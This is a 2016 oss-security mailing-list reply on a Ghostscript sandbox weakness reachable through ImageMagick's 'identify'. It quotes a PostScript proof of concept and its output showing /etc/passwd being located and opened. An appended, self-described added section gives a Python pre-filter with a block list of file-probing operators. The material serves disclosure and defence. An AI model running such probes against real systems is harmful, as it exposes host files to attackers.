Date: Thu, 29 Sep 2016 08:25:54 +0200
From: Florian Weimer <fw@...eb.enyo.de>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

* Tavis Ormandy:

> Here is the code I'm testing with (Note: I really don't know much
> postscript - and I hate it).
>
> $ cat test.ps
> /dumpname {
>     dup             % copy filename
>     dup             % copy filename
>     print           % print filename
>     (\n) print      % print newline
>     status          % stat filename
>     {
>         (stat succeeded\n) print
>         ( ctime:) print
>         64 string cvs print
>         ( atime:) print
>         64 string cvs print
>         ( size:) print
>         64 string cvs print
>         ( blocks:) print
>         64 string cvs print
>         (\n) print
>         (\n) print
>     }{
>         (unable to stat\n\n) print
>     } ifelse
>     .libfile        % open as library
>     {
>         (.libfile returned file\n\n) print
>         64 string readstring
>         pop         % discard result (should probably test)
>         print
>         (\n) print
>     }{
>         (.libfile returned string\n) print
>         print
>         (\n) print
>     } ifelse
> } def
>
> (/etc/pass*) /dumpname load 256 string filenameforall

filenameforall was fixed as part of this:

  http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
  http://bugs.ghostscript.com/show_bug.cgi?id=694724

This also covers getenv and has already been assigned CVE-2013-5653.

> $ identify test.ps
> /etc/passwd
> stat succeeded
>  ctime:1474998792 atime:1474998792 size:2662 blocks:8
>
> .libfile returned file

.libfile is not yet fixed upstream.  I reported this upstream:

  http://bugs.ghostscript.com/show_bug.cgi?id=697169
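A defender-side pre-filter for the class of probe quoted above, added here as an example; it is not part of this thread, of Ghostscript or of ImageMagick. It blanks out PostScript string literals and comments, tokenises what remains, and reports which file-system-probing operators appear in executable position, so a service that hands uploads to `identify` can reject or quarantine such files before Ghostscript ever runs. The first four operators in the set (`status`, `.libfile`, `filenameforall`, `getenv`) come from the thread; `file`, `deletefile`, `renamefile` and `run` are assumed additions, standard PostScript file operators that the same sandbox is meant to gate. The sample input is a trimmed copy of the quoted `test.ps`, plus a constructed benign file that mentions `status` only inside a string and as a literal name.

```python
"""Flag PostScript inputs that call file-system-probing operators.

Added example (not from the thread).  Use it as a pre-check in front of
`identify`, not as a replacement for disabling the PS/EPS/PDF coders.
"""
import re

# Operators that touch the host file system or environment.  The first four
# appear in the thread above; the rest are assumed additions (standard
# PostScript file operators that -dSAFER is meant to restrict).
PROBE_OPERATORS = {
    "status", ".libfile", "filenameforall", "getenv",   # from the thread
    "file", "deletefile", "renamefile", "run",          # assumed additions
}

# Trimmed copy of the quoted test.ps: stat, open and glob files from inside
# the interpreter.  Constructed sample input for this example.
SAMPLE_PS = """\
/dumpname {
    dup             % copy filename
    dup
    print
    (\\n) print
    status          % stat filename
    { (stat succeeded\\n) print } { (unable to stat\\n\\n) print } ifelse
    .libfile        % open as library
    { 64 string readstring pop print } { print } ifelse
} def
(/etc/pass*) /dumpname load 256 string filenameforall
"""

# Constructed benign input: "status" appears only inside a string literal and
# as a literal name (/status), neither of which executes the operator.
BENIGN_PS = "%!PS-Adobe-3.0\n(status: ok) show\n/status 1 def\n"


def strip_strings_and_comments(src: str) -> str:
    """Blank out (...) string literals and %-comments, keeping everything else.

    Strings may nest parentheses and escape characters with a backslash; a
    comment runs to end of line.  Each removed span becomes a single space so
    the tokens on either side stay separated.
    """
    out = []
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c == "(":
            depth, i = 1, i + 1
            while i < n and depth:
                if src[i] == "\\":      # escaped char: skip it and its escape
                    i += 2
                    continue
                if src[i] == "(":
                    depth += 1
                elif src[i] == ")":
                    depth -= 1
                i += 1
            out.append(" ")
        elif c == "%":
            while i < n and src[i] != "\n":
                i += 1
            out.append(" ")
        else:
            out.append(c)
            i += 1
    return "".join(out)


def find_probes(src: str) -> list[str]:
    """Return the sorted set of probe operators used in executable position.

    Tokens are split on PostScript delimiters; names written with a leading
    slash are literal names (e.g. /dumpname) and are not counted as calls.
    """
    cleaned = strip_strings_and_comments(src)
    tokens = re.findall(r"/?[^\s()<>\[\]{}/%]+", cleaned)
    hits = {t for t in tokens if not t.startswith("/") and t in PROBE_OPERATORS}
    return sorted(hits)


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_PS), ("benign", BENIGN_PS)):
        found = find_probes(text)
        verdict = "REJECT" if found else "ok"
        print(f"{label}: {verdict} {found}")
```

The scanner is a signal, not a sandbox: PostScript can build operator names at run time (`cvx`, `exec`), so a clean scan only means the file does not call these operators by name. The durable fix on the ImageMagick side is to refuse PostScript-family inputs entirely through its `policy.xml` coder policy, and on the Ghostscript side to run a version with the fixes referenced above.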
